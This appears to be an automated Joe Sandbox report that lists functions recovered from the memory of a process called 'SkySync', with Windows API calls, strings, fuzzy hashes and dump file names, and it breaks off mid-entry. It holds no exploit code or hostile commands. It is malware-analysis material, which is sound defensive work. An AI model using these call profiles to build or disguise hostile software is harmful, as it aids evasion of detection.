Instruction ID: 18f1ebde48ea210144d8e6698f50317552ae5bb21dcf8750ada105ed24ce52a6
Opcode Fuzzy Hash: b8ef4b18dbc8b440e1c379760774e40fb78d0a0749ed87a1065bb9b56d911840
Instruction Fuzzy Hash: 5C11B23195012DB9D724ABB6CC9ADFF7BBCEBD2B50F400469B601A30E1EFA05E04C5A0

Function 00AF5530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00AF5535

Part of subcall function 00AB083E: timeGetTime.WINMM(?,00000002,00A9C22C), ref: 00AB0842

Sleep.KERNEL32(0000000A), ref: 00AF5561
EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00AF5585
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00AF55A7
SetActiveWindow.USER32 ref: 00AF55C6
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00AF55D4
SendMessageW.USER32(00000010,00000000,00000000), ref: 00AF55F3
Sleep.KERNEL32(000000FA), ref: 00AF55FE
IsWindow.USER32 ref: 00AF560A
EndDialog.USER32(00000000), ref: 00AF561B

Strings

BUTTON, xrefs: 00AF5599

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 86829bc77872673ea8e04f7b97e6833d31b952abc82d894b46052d37903c7cf1
Instruction ID: 560181e1b76855c82639d791f0fb52308f35c5efc7ca39a7c447e2fcea20cf5b
Opcode Fuzzy Hash: 86829bc77872673ea8e04f7b97e6833d31b952abc82d894b46052d37903c7cf1
Instruction Fuzzy Hash: 9C219D70604708AFEBA26BB0FD99B367B6AEB54346F041058F341D31B2EF718D529B61

Function 00AA5BD7 Relevance: 18.2, APIs: 12, Instructions: 215windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00B57890), ref: 00AE0E7B
GetMenuItemCount.USER32(00B57890), ref: 00AE0F2B
GetCursorPos.USER32(?), ref: 00AE0F6F
SetForegroundWindow.USER32(00000000), ref: 00AE0F78
TrackPopupMenuEx.USER32(00B57890,00000000,?,00000000,00000000,00000000), ref: 00AE0F8B
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AE0F97

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID:
API String ID: 36266755-0
Opcode ID: f7a8848527f7f61c5042144f4d1342ac11cffd3f643289671623cf97bfb396b4
Instruction ID: 289973df682ce19c101fdbf39d9e17a4afe1ac808f6185fcf12370b48f92f678
Opcode Fuzzy Hash: f7a8848527f7f61c5042144f4d1342ac11cffd3f643289671623cf97bfb396b4
Instruction Fuzzy Hash: 2A71E130A44749BFEB209F65DC85FAABF64FF05364F140216F614671E1CBB168A0DB94

Function 00AF081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AF0896
SetKeyboardState.USER32(?), ref: 00AF0901
GetAsyncKeyState.USER32(000000A0), ref: 00AF0921
GetKeyState.USER32(000000A0), ref: 00AF0938
GetAsyncKeyState.USER32(000000A1), ref: 00AF0967
GetKeyState.USER32(000000A1), ref: 00AF0978
GetAsyncKeyState.USER32(00000011), ref: 00AF09A4
GetKeyState.USER32(00000011), ref: 00AF09B2
GetAsyncKeyState.USER32(00000012), ref: 00AF09DB
GetKeyState.USER32(00000012), ref: 00AF09E9
GetAsyncKeyState.USER32(0000005B), ref: 00AF0A12
GetKeyState.USER32(0000005B), ref: 00AF0A20

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 5c3707c2c207e86634a781f5a5bf023c64777c7a5ddf44516a79e8c367c4ef87
Instruction ID: 37b2414078874544456797cca4df8f702058016ab7f042983d772987433e09a4
Opcode Fuzzy Hash: 5c3707c2c207e86634a781f5a5bf023c64777c7a5ddf44516a79e8c367c4ef87
Instruction Fuzzy Hash: 3B51CB2490478C59FB35EBF04954BBABFB49F113C0F084599E6C2571C3EAA49A4CCBD1

Function 00AECE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00AECE1C
GetWindowRect.USER32(00000000,?), ref: 00AECE2E
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AECE8C
GetDlgItem.USER32(?,00000002), ref: 00AECE97
GetWindowRect.USER32(00000000,?), ref: 00AECEA9
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AECEFD
GetDlgItem.USER32(?,000003E9), ref: 00AECF0B
GetWindowRect.USER32(00000000,?), ref: 00AECF1C
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AECF5F
GetDlgItem.USER32(?,000003EA), ref: 00AECF6D
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AECF8A
InvalidateRect.USER32(?,00000000,00000001), ref: 00AECF97

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: f3a2ebbfbc4cc84f79f54488845baa6a3eec04e2fdcffde64d1487cc8ba1293e
Instruction ID: 03906f98a332e8638d510a021b471c8085c4c8ef269f30cec52f0bef8e399647
Opcode Fuzzy Hash: f3a2ebbfbc4cc84f79f54488845baa6a3eec04e2fdcffde64d1487cc8ba1293e
Instruction Fuzzy Hash: 7E516371B10205AFDB18DF69CD85AAEBBB6FB88710F14812DF515D7291DB70AD018B50

Function 00A923F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A92412,?,00000000,?,?,?,?,00A91AA7,00000000,?), ref: 00A91F76

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00A924AF
KillTimer.USER32(-00000001,?,?,?,?,00A91AA7,00000000,?,?,00A91EBE,?,?), ref: 00A9254A
DestroyAcceleratorTable.USER32(00000000), ref: 00ACBFE7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A91AA7,00000000,?,?,00A91EBE,?,?), ref: 00ACC018
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A91AA7,00000000,?,?,00A91EBE,?,?), ref: 00ACC02F
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00A91AA7,00000000,?,?,00A91EBE,?,?), ref: 00ACC04B
DeleteObject.GDI32(00000000), ref: 00ACC05D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: df70576a9209103e7af92066fb2022b459fe67a89447d5219927e9af77aff32f
Instruction ID: 2dd1508f466349666bfb57a21fc986fa6acfa4fb2594e1a121492dab3ff36402
Opcode Fuzzy Hash: df70576a9209103e7af92066fb2022b459fe67a89447d5219927e9af77aff32f
Instruction Fuzzy Hash: A461A731225701EFDB35AF19E948B2AB7F1FB80322F11856DE4464BA60CB75AC81DF91

Function 00A92581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 00A929AB: GetWindowLongW.USER32(?,000000EB), ref: 00A929BC

GetSysColor.USER32(0000000F), ref: 00A925AF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: a1aba7f3083dcd1151c1c637ae7d7acc6207adeef9e1dd7d6948788d960b67db
Instruction ID: bf02a41422c21f13b99b9e8c0ec0d730adce35302b5f874d4626dbf17d3b82bd
Opcode Fuzzy Hash: a1aba7f3083dcd1151c1c637ae7d7acc6207adeef9e1dd7d6948788d960b67db
Instruction Fuzzy Hash: E041A631204140BFDF216F289C88BF937A6EB06331F194265FE659B1E6DB308C42DB21

Function 00AEB13A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00AEB17B
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AEB284
GetClassNameW.USER32(?,?,00000400), ref: 00AEB2F7
GetDlgCtrlID.USER32(?), ref: 00AEB349
GetWindowRect.USER32(?,?), ref: 00AEB37F
GetParent.USER32(?), ref: 00AEB39D
ScreenToClient.USER32(00000000), ref: 00AEB3A4
GetClassNameW.USER32(?,?,00000100), ref: 00AEB41E
GetWindowTextW.USER32(?,?,00000400), ref: 00AEB458

Strings

%s%u, xrefs: 00AEB216

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
String ID: %s%u
API String ID: 1412819556-679674701
Opcode ID: 61eb63e51195f63fa595a2fd4e7e3558f1e9a6e6133c353e9925aee287068bf3
Instruction ID: 40896cc00f867a632a10c0fbaf2107e377e923691d46c5d024a9385fa3bde6e1
Opcode Fuzzy Hash: 61eb63e51195f63fa595a2fd4e7e3558f1e9a6e6133c353e9925aee287068bf3
Instruction Fuzzy Hash: 09A1E071224346EFD715EF65C888BEBB7A8FF44310F004619F999D2192EB30E955CBA1

Function 00AEBA6D Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00AEBAB1
GetWindowTextW.USER32(00000001,?,00000400), ref: 00AEBAEA
CharUpperBuffW.USER32(?,00000000), ref: 00AEBB07
GetClassNameW.USER32(00000018,?,00000400), ref: 00AEBB6E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00AEBBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00AEBBEE
GetClassNameW.USER32(00000010,?,00000400), ref: 00AEBC26
GetWindowRect.USER32(00000004,?), ref: 00AEBC8F

Strings

ThumbnailClass, xrefs: 00AEBB79, 00AEBBF9
@, xrefs: 00AEBA92

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper
String ID: @$ThumbnailClass
API String ID: 3725905772-1539354611
Opcode ID: e80c6c104105a93720c3695e66512c56e525457f24af16bc100e14ada5caf52f
Instruction ID: 306a0897639f3bd77ac16c54e6fe2d132e792e03a882f6dde332d92e198c8c6f
Opcode Fuzzy Hash: e80c6c104105a93720c3695e66512c56e525457f24af16bc100e14ada5caf52f
Instruction Fuzzy Hash: C781C0710182899FDB10DF12C989FAB77E8EF88314F148469FD898A0A6DB30DD45CB71

Function 00AF0065 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00ADF8B8,00000001,0000138C,00000001,00000001,00000001,?,00B03FF9,00000001), ref: 00AF009A
LoadStringW.USER32(00000000,?,00ADF8B8,00000001), ref: 00AF00A3
GetModuleHandleW.KERNEL32(00000000,00B57310,?,00000FFF,?,?,00ADF8B8,00000001,0000138C,00000001,00000001,00000001,?,00B03FF9,00000001,00000001), ref: 00AF00C5
LoadStringW.USER32(00000000,?,00ADF8B8,00000001), ref: 00AF00C8
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AF01E9

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00AF01CD
Error: , xrefs: 00AF01A0
Line %d:, xrefs: 00AF0123
Line %d (File "%s"):, xrefs: 00AF0112
^ ERROR, xrefs: 00AF017E

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 4072794657-2268648507
Opcode ID: ed876d200b9a74cc7ab989ad57ee4b349931e2bc7988cea6de68a305908349d8
Instruction ID: e5c4e1847c94347eaf07863704ba14d50c1ac96172d95eda47d5472daca334c4
Opcode Fuzzy Hash: ed876d200b9a74cc7ab989ad57ee4b349931e2bc7988cea6de68a305908349d8
Instruction Fuzzy Hash: 28410872840219BACB14EBE0CE96EEEB779AF15341F500165F605A3092EB356F49CBA1

Function 00AE83FA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AE84BE
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AE84DA
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AE84F6
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AE8520
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AE8548
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AE8553
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AE8558

Strings

\CLSID, xrefs: 00AE8440
\IPC$, xrefs: 00AE84A0
SOFTWARE\Classes\, xrefs: 00AE842A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 3030280669-22481851
Opcode ID: 3b7b02b2d9742811903809095c1c4c8b695cb6e20fb34a60b1fd609e44b6b286
Instruction ID: 2c1723c1bfa10bc38b9aff7d1596db6fa4fdc1e19f369e8c7dc86b7cbb2126fb
Opcode Fuzzy Hash: 3b7b02b2d9742811903809095c1c4c8b695cb6e20fb34a60b1fd609e44b6b286
Instruction Fuzzy Hash: B1410372C1022DABCB21EBA4DC95DEEB7B8FF08350F004169E815A31A1EB359E05CB90

Function 00AFA832 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00AFA852
CreateDirectoryW.KERNEL32(?,00000000), ref: 00AFA8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00AFA8D6
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00AFA966
CloseHandle.KERNEL32(00000000), ref: 00AFA971
RemoveDirectoryW.KERNEL32(?), ref: 00AFA97A
CloseHandle.KERNEL32(00000000), ref: 00AFA984

Strings

\??\%s, xrefs: 00AFA86E
:, xrefs: 00AFA895
\, xrefs: 00AFA88A

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
String ID: :$\$\??\%s
API String ID: 3827137101-3457252023
Opcode ID: 22930f3504f52c020951521cd196dbfee0e05d32056d01d8ceb85c2e1eb6242b
Instruction ID: 40fe62bcf848a845bc4c058b174d06d0d37ad18309ef53b1acffa8bf0fbd7cd5
Opcode Fuzzy Hash: 22930f3504f52c020951521cd196dbfee0e05d32056d01d8ceb85c2e1eb6242b
Instruction Fuzzy Hash: 943190B251021AABDB21DFA0DC89FFB77BCEF89700F1041B6F608D2161EB7096458B65

Function 00B17AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B17B83
CreateCompatibleDC.GDI32(00000000), ref: 00B17B8A
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B17B9D
SelectObject.GDI32(00000000,00000000), ref: 00B17BA5
GetPixel.GDI32(00000000,00000000,00000000), ref: 00B17BB0
DeleteDC.GDI32(00000000), ref: 00B17BB9
GetWindowLongW.USER32(?,000000EC), ref: 00B17BC3
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B17BD7
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B17BE3

Strings

static, xrefs: 00B17B1B

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 8c4bf6c29791fa24a17fcf9debe5b53c20d622962e6c5d61e20cc646cc887d55
Instruction ID: 893cd1e8514ef1fdf657ab1ab3fb131ecb1b5756d7d722b34719c9567c1c7be3
Opcode Fuzzy Hash: 8c4bf6c29791fa24a17fcf9debe5b53c20d622962e6c5d61e20cc646cc887d55
Instruction Fuzzy Hash: 37318D32158219ABDF22AF64DC49FDB3BA9FF09320F100254FA15A31A1CB31D861DBA4

Function 00AFDBD0 Relevance: 16.8, APIs: 11, Instructions: 283comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00AFDC2D
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00AFDCC0
SHGetDesktopFolder.SHELL32(?), ref: 00AFDCD4
CoCreateInstance.OLE32(00B23D4C,00000000,00000001,00B4B86C,?), ref: 00AFDD20
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00AFDD8F
CoTaskMemFree.OLE32(?,?), ref: 00AFDDE7
SHBrowseForFolderW.SHELL32(?), ref: 00AFDE60
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00AFDE83
CoTaskMemFree.OLE32(00000000), ref: 00AFDE8A
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00AFDEC1
CoUninitialize.OLE32(00000001,00000000), ref: 00AFDEC3

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 286c67de885c82bb9add33d75983364f667c95b138bee094ba75538b20377cb2
Instruction ID: 9c85f142ef012ac9405522e555249e1f3bf49bbb1a44b496953a3bcff6fd543f
Opcode Fuzzy Hash: 286c67de885c82bb9add33d75983364f667c95b138bee094ba75538b20377cb2
Instruction Fuzzy Hash: 65B1EB75A00109AFDB15EFA4C989DAEBBF9FF48304B148459F905EB261DB30EE46CB50

Function 00AE77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AE77DD
SafeArrayAllocData.OLEAUT32(?), ref: 00AE7836
VariantInit.OLEAUT32(?), ref: 00AE7848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AE7868
VariantCopy.OLEAUT32(?,?), ref: 00AE78BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AE78CF
VariantClear.OLEAUT32(?), ref: 00AE78E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00AE78F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE78FA
VariantClear.OLEAUT32(?), ref: 00AE790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AE7917

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 4d37438ea317734513d44e5d1f33659eef4411db4e1766a377d1de5e8d3711d0
Instruction ID: 508c5e9c90bd5fbe48f1fec6db36d396587fe79be062a539d8149d69e36015a1
Opcode Fuzzy Hash: 4d37438ea317734513d44e5d1f33659eef4411db4e1766a377d1de5e8d3711d0
Instruction Fuzzy Hash: 46416235A041199FCF10EFA9C848DADBBB9FF58344F00C069E955A7362CB30AA46CF90

Function 00AF0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

